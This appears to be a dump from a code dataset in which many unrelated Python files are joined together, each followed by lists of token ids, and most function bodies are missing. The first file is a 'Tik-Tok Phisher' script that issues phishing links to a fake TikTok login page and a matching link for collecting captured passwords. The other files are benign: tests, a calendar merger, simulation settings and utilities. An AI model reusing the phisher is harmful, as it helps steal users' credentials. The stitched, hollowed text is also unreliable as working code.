SBR = W+"("+R+"π"+W+")"
SBG = W+"("+G+"π"+W+")"
SRO = W+"("+R+">"+W+")"
SGO = W+"("+G+">"+W+")"
SEO = W+"("+R+"!"+W+")"
newlin = "\n"
#SBG = '\x1b[1;37m(\x1b[1;32m\xe2\x97\x8f\x1b[1;37m)'
#SBR = '\x1b[1;37m(\x1b[1;37m\x1b[31m\xe2\x97\x8f\x1b[1;37m)'
import os
from base64 import *
from random import choice as c
import time
banner = """
{}
┈┈┈╲┈┈┈┈╱
┈┈┈╱ ▔▔╲
┈┈┃┈▇┈┈▇┈┃ {} DarkSec Present's{}
╭╮┣━━━━━━┫╭╮
┃┃┃┈┈┈┈┈┈┃┃┃ {}Tik-Tok Phisher V1.1{}
╰╯┃┈┈┈┈┈┈┃╰╯ {} By : Nasir Ali{}
┈┈╰┓┏━━┓┏╯
┈┈┈╰╯┈┈╰╯
{}Youtube :{} youtube.com/TheDarkSec
{}Github : {}github.com/nasirxo
{}Facebook :{} facebook.com/nasir.xo
""".format(Y,R,Y,G,Y,G,Y,G,W,G,W,G,W)
os.system("clear")
print(banner)
i=0
key = "darksec47"
while i==0:
try:
#r = get("https://mbasic.facebook.com/nasir.xo")
#data = BeautifulSoup(r.content,features="html.parser")
#xD = data.find('span', attrs={'dir': 'ltr'})
#key = xD.get_text().split()[0]
ikey = input(SBR+" Enter License Key : ")
if ikey == key:
print(SGO+" Authorization Sucessfull ! ")
time.sleep(3)
while i==0:
os.system('clear')
time.sleep(2)
print(banner)
print("""
{} [Select-Option]
{} (1) : Generate Phishing Link
{} (2) : Exit
""".format(Y,SBG,SBG))
op = input(SRO+" Option : ")
n = list('abcdefghijklmnopqrstuvwxyz1234567890')
if str(op) == '1':
ID = ''.join([c(n) for x in range(5)])
KE = b16encode(ID.encode("utf-8"))
print("""
{} [ Link-Generated ]
{} ===================================================
{} Phishing Link :
http://tik-tok.rf.gd/login.php?ID={}
{} Passwords Link :
http://tik-tok.rf.gd/pass.php?KEY={}
{} ===================================================
""".format(G,Y,SGO,ID,SGO,KE.decode("utf-8"),Y))
f = input()
elif str(op) == '2':
print(SBR+" BYE BYE !")
i+=1
quit()
else:
print(SEO+" Invalid Input ! ")
print(SEO+" Invalid Key ! ")
except:
pass | [
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
198,
198,
2,
5216,
4662,
2896,
1389,
15965,
2977,
198,
198,
54,
220,
796,
705,
59,
44427,
58,
16,
26,
2718,
76,
6,
198,
45,
220,
796,
705,
59,
44427,
58,
15,
76,
6,
... | 1.643202 | 1,449 |
import numpy as np
import unittest
from chainercv.utils import assert_is_image
from chainercv.utils import testing
@testing.parameterize(
{
'img': np.random.randint(0, 256, size=(3, 48, 64)),
'color': True, 'check_range': True, 'valid': True},
{
'img': np.random.randint(0, 256, size=(1, 48, 64)),
'color': True, 'check_range': True, 'valid': False},
{
'img': np.random.randint(0, 256, size=(4, 48, 64)),
'color': True, 'check_range': True, 'valid': False},
{
'img': np.ones((3, 48, 64)) * 256,
'color': True, 'check_range': True, 'valid': False},
{
'img': np.ones((3, 48, 64)) * -1,
'color': True, 'check_range': True, 'valid': False},
{
'img': np.ones((3, 48, 64)) * 256,
'color': True, 'check_range': False, 'valid': True},
{
'img': np.random.randint(0, 256, size=(1, 48, 64)),
'color': False, 'check_range': True, 'valid': True},
{
'img': np.random.randint(0, 256, size=(3, 48, 64)),
'color': False, 'check_range': True, 'valid': False},
{
'img': np.ones((1, 48, 64)) * 256,
'color': False, 'check_range': True, 'valid': False},
{
'img': np.ones((1, 48, 64)) * -1,
'color': False, 'check_range': True, 'valid': False},
{
'img': np.ones((1, 48, 64)) * 256,
'color': False, 'check_range': False, 'valid': True},
{
'img': (((0, 1), (2, 3)), ((4, 5), (6, 7)), ((8, 9), (10, 11))),
'color': True, 'check_range': True, 'valid': False},
)
testing.run_module(__name__, __file__)
| [
11748,
299,
32152,
355,
45941,
198,
11748,
555,
715,
395,
198,
198,
6738,
6333,
2798,
85,
13,
26791,
1330,
6818,
62,
271,
62,
9060,
198,
6738,
6333,
2798,
85,
13,
26791,
1330,
4856,
628,
198,
31,
33407,
13,
17143,
2357,
1096,
7,
198... | 2.134211 | 760 |
import os
import numpy as np
theta_spacing = 0.07
phi_spacing = 0.02
R1 = 1
R2 = 2
K2 = 5
screen_width = 50
screen_height = 50
K1 = screen_width * K2 * 3 / (8 * (R1 + R2))
def calc_luminance(cos_a, cos_b, cos_phi, cos_theta, sin_a, sin_b, sin_phi, sin_theta):
"""
Luminance should be equal to:
cosphi*costheta*sinB - cosA*costheta*sinphi -
sinA*sintheta + cosB*(cosA*sintheta - costheta*sinA*sinphi);
:param cos_a:
:param cos_b:
:param cos_phi:
:param cos_theta:
:param sin_a:
:param sin_b:
:param sin_phi:
:param sin_theta:
:return:
"""
return cos_phi * cos_theta * sin_b - \
cos_a * cos_theta * sin_phi - \
sin_a * sin_theta + cos_b * (
cos_a * sin_theta - cos_theta * sin_a * sin_phi
)
def calc_3d_coordinates(circle_x, circle_y, cos_a, cos_b, cos_phi, sin_a, sin_b, sin_phi):
"""
Calculating coordinates in 3D space should be equal to:
x = circlex*(cosB*cosphi + sinA*sinB*sinphi) - circley*cosA*sinB;
y = circlex*(sinB*cosphi - sinA*cosB*sinphi) + circley*cosA*cosB;
z = K2 + cosA*circlex*sinphi + circley*sinA;
:param circle_x:
:param circle_y:
:param cos_a:
:param cos_b:
:param cos_phi:
:param sin_a:
:param sin_b:
:param sin_phi:
:return:
"""
x = circle_x * (cos_b * cos_phi + sin_a * sin_b * sin_phi) - circle_y * cos_a * sin_b
y = circle_x * (sin_b * cos_phi - sin_a * cos_b * sin_phi) + circle_y * cos_a * cos_b
z = K2 + cos_a * circle_x * sin_phi + circle_y * sin_a
return x, y, z
while True:
for angle in np.arange(0, np.pi, np.pi / 12):
render_frame(np.pi / 2 + angle, np.pi / 2 + angle / 2)
| [
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
198,
1169,
8326,
62,
2777,
4092,
796,
657,
13,
2998,
198,
34846,
62,
2777,
4092,
796,
657,
13,
2999,
198,
198,
49,
16,
796,
352,
198,
49,
17,
796,
362,
198,
42,
17,
796,
642,
... | 2.027091 | 849 |
#!/usr/bin/python
#This script assumes that gnuplot is in the environment PATH
import getopt, logging, sys, SneeqlLib, TossimLib, AvroraLib, os, UtilLib, checkTupleCount, RandomSeeder, networkLib, StatLib, GraphData
optSneeqlRoot = os.getenv("SNEEQLROOT")
optNumAgendaEvals = 2
optQueryDuration = UtilLib.monthsToSeconds(6)
optOutputRoot = os.getenv("HOME")+"/tmp/output"
optLabel = 'qosCmp'
optTimeStampOutput = True
#optTimeStampOutput = False
optDoTossim = False
optDoAvrora = True
optNumAvroraRuns = 1 #The number times the same avrora simulation is repeated
optTossimSyncTime = 4
optDoAvroraCandidates = False
optDoTossimCandidates = False
optDoModel = True
SneeqlLib.optCompileSneeql = True
#Network options
optGenerateRandomNet = False
optSneeqlNetFile = optSneeqlRoot + "/input/networks/10-node-topology.xml"
optAvroraNetFile = None
optNetNumNodes = 10
optNetXDim = 100
optNetYDim = 100
#Schema options
optGenerateRandomSchemas = False
#optNumSchemas = 10
optNumSchemas = 6
optSchemaFile = optSneeqlRoot + "/input/pipes/10-node-schemas.xml"
#Scenario-generation options
#optQueries = ["Q0", "Q2", "Q3temp"]
optQueries = ["Q0"]
optAcqRates = [15000]
optMaxBufferingFactors = [None]
#optMaxBufferingFactors = [1]
optQoS = ["min-acq", "min-delivery", "min-energy", "max-lifetime"]
#optQoS = ["min-energy", "max-lifetime"]
optQoSAwareRouting = False
optQoSAwareWhereScheduling = False
optQoSAwareWhenScheduling = False
optRoutingTreesToGenerate = 50
optRoutingTreesToKeep = 5
optBufferingFactor = None
#Ouput info message to screen and logger if applicable
#Ouput warning message to screen and logger if applicable
#Ouput error message to screen and logger if applicable
#Query 3 has a time window, so the fromWindow parameters needs to be adjusted depending on the acquisition interval
#Query 4 has a time window, so the fromWindow parameters needs to be adjusted depending on the acquisition interval
#Tests a candidate plan using Tossim
#get dictionary with summary information for that candidate
#Tests a candidate plan using Avrora
#Invoke tossim simulation for each candidate query-plan
#Invoke avrora simulation for each candidate query-plan
#Tests a specific scenario in Tossim and Avrora
#queryDuration in seconds
#alpha in ms
#total Energy in Joules
#Gets network files specified by user, or generates random network
#Generates different scenarios to be tested
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
1212,
4226,
18533,
326,
19967,
84,
29487,
318,
287,
262,
2858,
46490,
198,
11748,
651,
8738,
11,
18931,
11,
25064,
11,
311,
21381,
13976,
25835,
11,
309,
793,
320,
25835,
11,
5184,
1472,
... | 3.075282 | 797 |
import os
import tensorflow as tf
from ..experiments import runner
import copy # noqa
import numpy as np
from datetime import datetime # noqa
from ..data import pointcloud_fetcher as pfetcher
from ..model import transforms as trans # noqa
from ..experiments import simplebase_experiment as set_exp
from ..experiments import config # noqa
from ..utils import misc as umisc
import plot3dscatter as pscat
| [
11748,
28686,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
6738,
11485,
23100,
6800,
1330,
17490,
198,
11748,
4866,
220,
1303,
645,
20402,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
4818,
8079,
1330,
4818,
8079,
220,
1303,
645,
204... | 3.60177 | 113 |
from __future__ import division, print_function, absolute_import
| [
6738,
11593,
37443,
834,
1330,
7297,
11,
3601,
62,
8818,
11,
4112,
62,
11748,
198
] | 4.333333 | 15 |
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.quasimode
#
# ----------------------------------------------------------------------------
"""
Implements the Quasimode.
This module implements a singleton class that represents the
quasimode. It handles all quasimodal key events, and the logic for
transitioning in and out of the quasimode. When the quasimode
terminates, it initiates the execution of the command, if any,
that the user indicated while in the quasimode. It also handles
the various kinds of user "error", which primarily consist of "no command
matches the text the user typed".
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import weakref
import logging
import traceback
from enso import messages
from enso import config
from enso import input
from enso.utils.strings import stringRatioBestMatch
from enso.utils.xml_tools import escape_xml
from enso.quasimode.suggestionlist import TheSuggestionList
from enso.quasimode.window import TheQuasimodeWindow
# Import the standard allowed key dictionary, which relates virtual
# key codes to character strings.
from enso.quasimode.charmaps import STANDARD_ALLOWED_KEYCODES \
as ALLOWED_KEYCODES
# ----------------------------------------------------------------------------
# TheQuasimode
# ----------------------------------------------------------------------------
class Quasimode:
"""
Encapsulates the command quasimode state and event-handling.
Future note: In code review, we realized that implementing the
quasimode is an ideal case for the State pattern; the Quasimode
singleton would have a private member for quasimode state, which
would be an instance of one of two classes, InQuasimode or
OutOfQuasimode, both descended from a QuasimodeState interface
class. Consequances of this include much cleaner transition code
and separation of event handling into the two states.
"""
__instance = None
@classmethod
@classmethod
def __init__( self, eventManager, commandManager ):
"""
Initialize the quasimode.
"""
self.__cmdManager = commandManager
# Boolean variable that records whether the quasimode key is
# currently down, i.e., whether the user is "in the quasimode".
self._inQuasimode = False
# The QuasimodeWindow object that is responsible for
# drawing the quasimode; set to None initially.
# A QuasimodeWindow object is created at the beginning of
# the quasimode, and destroyed at the completion of the
# quasimode.
self.__quasimodeWindow = None
# The suggestion list object, which is responsible for
# maintaining all the information about the auto-completed
# command and suggested command names, and the text typed
# by the user.
self.__suggestionList = TheSuggestionList( self.__cmdManager )
# Boolean variable that should be set to True whenever an event
# occurs that requires the quasimode to be redrawn, and which
# should be set to False when the quasimode is drawn.
self.__needsRedraw = False
# Whether the next redraw should redraw the entire quasimodal
# display, or only the description and user text.
self.__nextRedrawIsFull = False
self.__eventMgr = eventManager
# Register a key event responder, so that the quasimode can
# actually respond to quasimode events.
self.__eventMgr.registerResponder( self.onKeyEvent, "key" )
# Creates new event types that code can subscribe to, to find out
# when the quasimode (or mode) is started and completed.
self.__eventMgr.createEventType( "startQuasimode" )
self.__eventMgr.createEventType( "endQuasimode" )
# Read settings from config file: are we modal?
# What key activates the quasimode?
# What keys exit and cancel the quasimode?
self.setQuasimodeKeyByName( input.KEYCODE_QUASIMODE_START,
config.QUASIMODE_START_KEY )
self.setQuasimodeKeyByName( input.KEYCODE_QUASIMODE_END,
config.QUASIMODE_END_KEY )
self.setQuasimodeKeyByName( input.KEYCODE_QUASIMODE_CANCEL,
config.QUASIMODE_CANCEL_KEY )
self.__isModal = config.IS_QUASIMODE_MODAL
self.__eventMgr.setModality( self.__isModal )
def onKeyEvent( self, eventType, keyCode ):
"""
Handles a key event of particular type.
"""
if eventType == input.EVENT_KEY_QUASIMODE:
if keyCode == input.KEYCODE_QUASIMODE_START:
assert not self._inQuasimode
self.__quasimodeBegin()
elif keyCode == input.KEYCODE_QUASIMODE_END:
assert self._inQuasimode
self.__quasimodeEnd()
elif keyCode == input.KEYCODE_QUASIMODE_CANCEL:
self.__suggestionList.clearState()
self.__quasimodeEnd()
elif eventType == input.EVENT_KEY_DOWN and self._inQuasimode:
# The user has typed a character, and we need to redraw the
# quasimode.
self.__needsRedraw = True
if keyCode == input.KEYCODE_TAB:
self.__suggestionList.autoType()
elif keyCode == input.KEYCODE_RETURN:
self.__suggestionList.autoType()
elif keyCode == input.KEYCODE_ESCAPE:
self.__suggestionList.clearState()
elif keyCode == input.KEYCODE_BACK:
# Backspace has been pressed.
self.__onBackspace()
elif keyCode == input.KEYCODE_DOWN:
# The user has pressed the down arrow; change which of the
# suggestions is "active" (i.e., will be executed upon
# termination of the quasimode)
self.__suggestionList.cycleActiveSuggestion( 1 )
self.__nextRedrawIsFull = True
elif keyCode == input.KEYCODE_UP:
# Up arrow; change which suggestion is active.
self.__suggestionList.cycleActiveSuggestion( -1 )
self.__nextRedrawIsFull = True
elif ALLOWED_KEYCODES.has_key( keyCode ):
# The user has typed a valid key to add to the userText.
self.__addUserChar( keyCode )
else:
# The user has pressed a key that is not valid.
pass
def __addUserChar( self, keyCode ):
"""
Adds the character corresponding to keyCode to the user text.
"""
newCharacter = ALLOWED_KEYCODES[keyCode]
oldUserText = self.__suggestionList.getUserText()
self.__suggestionList.setUserText( oldUserText + newCharacter )
# If the user had indicated one of the suggestions, then
# typing a character snaps the active suggestion back to the
# user text and auto-completion.
self.__suggestionList.resetActiveSuggestion()
def __onBackspace( self ):
"""
Deletes one character, if possible, from the user text.
"""
oldUserText = self.__suggestionList.getUserText()
if len( oldUserText ) == 0:
# There is no user text; backspace does nothing.
return
self.__suggestionList.setUserText( oldUserText[:-1] )
# If the user had indicated anything on the suggestion list,
# then hitting backspace snaps the active suggestion back to
# the user text.
self.__suggestionList.resetActiveSuggestion()
def __quasimodeBegin( self ):
"""
Executed when user presses the quasimode key.
"""
assert self._inQuasimode == False
if self.__quasimodeWindow == None:
logging.info( "Created a new quasimode window!" )
self.__quasimodeWindow = TheQuasimodeWindow()
self.__eventMgr.triggerEvent( "startQuasimode" )
self.__eventMgr.registerResponder( self.__onTick, "timer" )
self._inQuasimode = True
self.__needsRedraw = True
# Postcondition
assert self._inQuasimode == True
def __onTick( self, timePassed ):
"""
Timer event responder. Re-draws the quasimode, if it needs it.
Only registered while in the quasimode.
NOTE: Drawing the quasimode takes place in __onTick() for
performance reasons. If a user mashed down 10 keys in
the space of a few milliseconds, and the quasimode was re-drawn
on every single keystroke, then the quasimode could suddenly
be lagging behind the user a half a second or more.
"""
# So pychecker doesn't complain...
dummy = timePassed
assert self._inQuasimode == True
if self.__needsRedraw:
self.__needsRedraw = False
self.__quasimodeWindow.update( self, self.__nextRedrawIsFull )
self.__nextRedrawIsFull = False
else:
# If the quasimode hasn't changed, then continue drawing
# any parts of it (such as the suggestion list) that
# haven't been drawn/updated yet.
self.__quasimodeWindow.continueDrawing()
def __quasimodeEnd( self ):
"""
Executed when user releases the quasimode key.
"""
# The quasimode has terminated; remove the timer responder
# function as an event responder.
self.__eventMgr.triggerEvent( "endQuasimode" )
self.__eventMgr.removeResponder( self.__onTick )
# LONGTERM TODO: Determine whether deleting or hiding is better.
logging.info( "Deleting the quasimode window." )
# Delete the Quasimode window.
del self.__quasimodeWindow
self.__quasimodeWindow = None
activeCommand = self.__suggestionList.getActiveCommand()
userText = self.__suggestionList.getUserText()
if activeCommand != None:
cmdName = self.__suggestionList.getActiveCommandName()
self.__executeCommand( activeCommand, cmdName )
elif len( userText ) > config.BAD_COMMAND_MSG_MIN_CHARS:
# The user typed some text, but there was no command match
self.__showBadCommandMsg( userText )
self._inQuasimode = False
self.__suggestionList.clearState()
def __executeCommand( self, cmd, cmdName ):
"""
Attempts to execute the command. Catches any errors raised by
the command code and deals with them appropriately, e.g., by
launching a bug report, informing the user, etc.
Commands should deal with user-errors, like lack of selection,
by displaying messages, etc. Exceptions should only be raised
when the command is actually broken, or code that the command
calls is broken.
"""
# The following message may be used by system tests.
logging.info( "COMMAND EXECUTED: %s" % cmdName )
try:
cmd.run()
except Exception:
# An exception occured during the execution of the command.
logging.error( "Command \"%s\" failed." % cmdName )
logging.error( traceback.format_exc() )
raise
def __showBadCommandMsg( self, userText ):
"""
Displays an error message telling the user that userText does
not match any command. Also, if there are any reasonable
commands that were similar but not matching, offers those to
the user as suggestions.
"""
# Generate a caption for the message with a couple suggestions
# for command names similar to the user's text
caption = self.__commandSuggestionCaption( escape_xml( userText ) )
badCmd = userText.lower()
badCmd = escape_xml( badCmd )
# Create and display a primary message.
text = config.BAD_COMMAND_MSG
text = text % ( badCmd, caption )
messages.displayMessage( text )
def __commandSuggestionCaption( self, userText ):
"""
Creates and returns a caption suggesting one or two commands
that are similar to userText.
"""
# Retrieve one or two command name suggestions.
suggestions = self.__cmdManager.retrieveSuggestions( userText )
cmds = [ s.toText() for s in suggestions ]
if len(cmds) > 0:
ratioBestMatch = stringRatioBestMatch( userText.lower(), cmds )
caption = config.ONE_SUGG_CAPTION
caption = caption % ratioBestMatch
else:
# There were no suggestions; so we don't want a caption.
caption = ""
return caption
| [
2,
15069,
357,
66,
8,
3648,
11,
5524,
1143,
11,
3457,
13,
198,
2,
1439,
2489,
10395,
13,
198,
2,
220,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
198,
2,
17613,
11,
389,
10431,
2810,
326,
... | 2.576548 | 5,637 |
# flake8: noqa
import wirepas_mesh_messaging
# Define list of default values used during testing
GATEWAY_ID = "test_gateway"
GATEWAY_STATE = wirepas_mesh_messaging.GatewayState.ONLINE
SINK_ID = "sink3"
RES_OK = wirepas_mesh_messaging.GatewayResultCode.GW_RES_OK
RES_KO = wirepas_mesh_messaging.GatewayResultCode.GW_RES_INTERNAL_ERROR
REQUEST_ID = 1234567
DESTINATION_ADD = 5678
SOURCE_ADD = 1234
SOURCE_EP = 98
DESTINATION_EP = 127
QOS = 0
DATA_PAYLOAD = bytes(b"Test")
INITIAL_DELAY = 12
RX_TIME_MS_EPOCH = int(123456789)
TRAVEL_TIME_MS = 123
HOP_COUNT = 10
NETWORK_ADDRESS = 0x123456
IMPLEMENTED_API_VERSION = 0
# Todo add more fields in config
NODE_CONFIG_1 = dict([("sink_id", SINK_ID), ("node_address", 123)])
SCRATCHPAD_SEQ = 12
SCRATCHPAD = bytes(bytearray(1024))
SCRATCHPAD_INFO = dict([("len", 2032), ("crc", 0x1234), ("seq", 112)])
SCRATCHPAD_TARGET_RAW = dict([("action", wirepas_mesh_messaging.ScratchpadAction.ACTION_PROPAGATE_AND_PROCESS),
("target_sequence", 18),
("param", 123)])
SCRATCHPAD_TARGET_DELAY = dict([("action", wirepas_mesh_messaging.ScratchpadAction.ACTION_PROPAGATE_AND_PROCESS_WITH_DELAY),
("target_sequence", 18),
("delay", wirepas_mesh_messaging.ProcessingDelay.DELAY_FIVE_DAYS)])
SCRATCHPAD_TARGET_MIN = dict([("action", wirepas_mesh_messaging.ScratchpadAction.ACTION_PROPAGATE_ONLY)])
SCRATCHPAD_STATUS = wirepas_mesh_messaging.ScratchpadStatus.SCRATCHPAD_STATUS_SUCCESS
SCRATCHPAD_TYPE = wirepas_mesh_messaging.ScratchpadType.SCRATCHPAD_TYPE_PRESENT
FIRMWARE_AREA_ID = 0x123456
| [
2,
781,
539,
23,
25,
645,
20402,
198,
198,
11748,
6503,
44429,
62,
76,
5069,
62,
37348,
3039,
198,
198,
2,
2896,
500,
1351,
286,
4277,
3815,
973,
1141,
4856,
198,
38,
6158,
27285,
62,
2389,
796,
366,
9288,
62,
10494,
1014,
1,
198,... | 2.205962 | 738 |
from ics import Calendar
from urllib.request import urlopen
url1 = "https://calendar.google.com/calendar/ical/marcel%40intuitionmachines.com/public/basic.ics"
url2 = "https://calendar.google.com/calendar/ical/dreamflasher%40dreamflasher.de/public/basic.ics"
c1 = Calendar(urlopen(url1).read().decode())
c2 = Calendar(urlopen(url2).read().decode())
for e in c2.events:
c1.events.add(e)
with open('calendar.ics', 'w') as f:
f.writelines(c1)
| [
6738,
220,
873,
1330,
26506,
198,
6738,
2956,
297,
571,
13,
25927,
1330,
19016,
9654,
198,
6371,
16,
796,
366,
5450,
1378,
9948,
9239,
13,
13297,
13,
785,
14,
9948,
9239,
14,
605,
14,
3876,
5276,
4,
1821,
600,
84,
653,
76,
620,
11... | 2.565714 | 175 |
from django.shortcuts import render
from rest_framework import viewsets
from rest_framework.filters import SearchFilter,OrderingFilter
from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination,CursorPagination
from .pagination import PersonPageNumberPagination,PersonLimitOffsetPagination,PersonCursorPagination
from .models import Person
from .serializers import PersonSerializer
# View with global pagenumber pagination
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
198,
6738,
1334,
62,
30604,
1330,
5009,
1039,
198,
6738,
1334,
62,
30604,
13,
10379,
1010,
1330,
11140,
22417,
11,
18743,
278,
22417,
198,
6738,
1334,
62,
30604,
13,
79,
363,
1883,
1330,... | 3.847458 | 118 |
import yaml
__all__ = ['Renderer', 'StatusRenderer']
| [
11748,
331,
43695,
198,
198,
834,
439,
834,
796,
37250,
49,
437,
11882,
3256,
705,
19580,
49,
437,
11882,
20520,
628,
198
] | 2.545455 | 22 |
from django.db import transaction
from api.management.data_script import OperationalDataScript
from api.models.NotionalTransferType import NotionalTransferType
class AddNotionalTransferTypes(OperationalDataScript):
"""
Adds Notional Transfer Types
"""
is_revertable = False
comment = 'Adds Notional Transfer Types'
@transaction.atomic
script_class = AddNotionalTransferTypes
| [
6738,
42625,
14208,
13,
9945,
1330,
8611,
198,
198,
6738,
40391,
13,
27604,
13,
7890,
62,
12048,
1330,
6564,
864,
6601,
7391,
198,
6738,
40391,
13,
27530,
13,
3673,
1538,
43260,
6030,
1330,
1892,
1538,
43260,
6030,
628,
198,
4871,
3060,... | 3.513043 | 115 |
#!/usr/bin/env python3
"""
Usage: poetry run test_parser FR production
"""
import datetime
import logging
import pprint
import time
import arrow
import click
from parsers.lib.parsers import PARSER_KEY_TO_DICT
from parsers.lib.quality import (
ValidationError,
validate_consumption,
validate_exchange,
validate_production,
)
logger = logging.getLogger(__name__)
logging.basicConfig(
level=logging.DEBUG, format="%(asctime)s %(levelname)-8s %(name)-30s %(message)s"
)
@click.command()
@click.argument("zone")
@click.argument("data-type", default="production")
@click.option("--target_datetime", default=None, show_default=True)
def test_parser(zone, data_type, target_datetime):
"""\b
Parameters
----------
zone: a two letter zone from the map
data_type: in ['production', 'exchangeForecast', 'production', 'exchange',
'price', 'consumption', 'generationForecast', 'consumptionForecast']
target_datetime: string parseable by arrow, such as 2018-05-30 15:00
\b
Examples
-------
>>> poetry run test_parser FR
>>> poetry run test_parser FR production
>>> poetry run test_parser NO-NO3-\>SE exchange
>>> poetry run test_parser GE production --target_datetime="2022-04-10 15:00"
"""
if target_datetime:
target_datetime = arrow.get(target_datetime).datetime
start = time.time()
parser = PARSER_KEY_TO_DICT[data_type][zone]
if data_type in ["exchange", "exchangeForecast"]:
args = zone.split("->")
else:
args = [zone]
res = parser(
*args, target_datetime=target_datetime, logger=logging.getLogger(__name__)
)
if not res:
raise ValueError("Error: parser returned nothing ({})".format(res))
elapsed_time = time.time() - start
if isinstance(res, (list, tuple)):
res_list = list(res)
else:
res_list = [res]
try:
dts = [e["datetime"] for e in res_list]
except:
raise ValueError(
"Parser output lacks `datetime` key for at least some of the "
"ouput. Full ouput: \n\n{}\n".format(res)
)
assert all(
[type(e["datetime"]) is datetime.datetime for e in res_list]
), "Datetimes must be returned as native datetime.datetime objects"
last_dt = arrow.get(max(dts)).to("UTC")
first_dt = arrow.get(min(dts)).to("UTC")
max_dt_warning = ""
if not target_datetime:
max_dt_warning = (
" :( >2h from now !!!"
if (arrow.utcnow() - last_dt).total_seconds() > 2 * 3600
else " -- OK, <2h from now :) (now={} UTC)".format(arrow.utcnow())
)
print("Parser result:")
pp = pprint.PrettyPrinter(width=120)
pp.pprint(res)
print(
"\n".join(
[
"---------------------",
"took {:.2f}s".format(elapsed_time),
"min returned datetime: {} UTC".format(first_dt),
"max returned datetime: {} UTC {}".format(last_dt, max_dt_warning),
]
)
)
if type(res) == dict:
res = [res]
for event in res:
try:
if data_type == "production":
validate_production(event, zone)
elif data_type == "consumption":
validate_consumption(event, zone)
elif data_type == "exchange":
validate_exchange(event, zone)
except ValidationError as e:
logger.warning("Validation failed @ {}: {}".format(event["datetime"], e))
if __name__ == "__main__":
# pylint: disable=no-value-for-parameter
print(test_parser())
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
37811,
198,
28350,
25,
19518,
1057,
1332,
62,
48610,
8782,
3227,
198,
37811,
198,
198,
11748,
4818,
8079,
198,
11748,
18931,
198,
11748,
279,
4798,
198,
11748,
640,
198,
198,
11748,
... | 2.332476 | 1,555 |
# -*- coding: utf-8 -*-
__author__ = 'vincent'
import uuid
import json
from redis_help import redis_client
from werkzeug.security import generate_password_hash, check_password_hash
from . import redis_help
# 下面这个包 itsdangerous 用于生成确认令牌
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
def generate_auth_token(secret_key, user_id, expire=3600):
'''使用编码后的用户ID字段值生成一个签名令牌,指定以秒为单位的过期时间'''
s = Serializer(secret_key, expires_in=expire)
# 设置Token值
token = s.dumps({'id': user_id, 'xid': uuid.uuid4().hex})
return token
def verify_auth_token(secret_key, token):
'''解码用户令牌,如果解码成功且可用,则返回对应用户ID'''
s = Serializer(secret_key)
try:
data = s.loads(token)
except:
return None
return redis_help.get('auth:token:{}'.format(data))
def set_token_cache(key, expire, **kwargs):
'''以管道方式批量执行命令,以哈希表方式存储 Token相关信息数据, kvs 是以一级结构存在的 k-v 值,v为字符串'''
# 创建一个 redis的管道命令对象
pipeline = redis_client.pipeline()
pipeline.hmset(key, kwargs)
pipeline.expire(key, expire)
pipeline.execute()
def get_token_cache(key):
'''获取缓存的 token 相关数据信息'''
kvs = redis_client.hgetall(key)
if not kvs: return None
return kvs
def delete_token_cache(key):
'''删除缓存的 token 相关数据信息'''
redis_client.delete(key)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
834,
9800,
834,
796,
705,
7114,
1087,
6,
198,
198,
11748,
334,
27112,
198,
11748,
33918,
198,
6738,
2266,
271,
62,
16794,
1330,
2266,
271,
62,
16366,
198,
198,
6738,
2... | 1.628931 | 795 |
import time
from redis.exceptions import WatchError
| [
11748,
640,
198,
198,
6738,
2266,
271,
13,
1069,
11755,
1330,
6305,
12331,
628
] | 3.857143 | 14 |
"""user bank updates
Revision ID: 273b8bcef694
Revises: 2e02a681aeaa
Create Date: 2021-06-22 17:22:00.102134
"""
import logging
from alembic import op
import sqlalchemy as sa
from sqlalchemy.orm import sessionmaker
logger = logging.getLogger(__name__)
# revision identifiers, used by Alembic.
revision = "273b8bcef694"
down_revision = "2e02a681aeaa"
branch_labels = None
depends_on = None
Session = sessionmaker()
| [
37811,
7220,
3331,
5992,
198,
198,
18009,
1166,
4522,
25,
38549,
65,
23,
65,
344,
69,
45214,
198,
18009,
2696,
25,
362,
68,
2999,
64,
48564,
3609,
7252,
198,
16447,
7536,
25,
33448,
12,
3312,
12,
1828,
1596,
25,
1828,
25,
405,
13,
... | 2.733766 | 154 |
from datetime import date #Importa biblioteca para pegar data e hora do pc
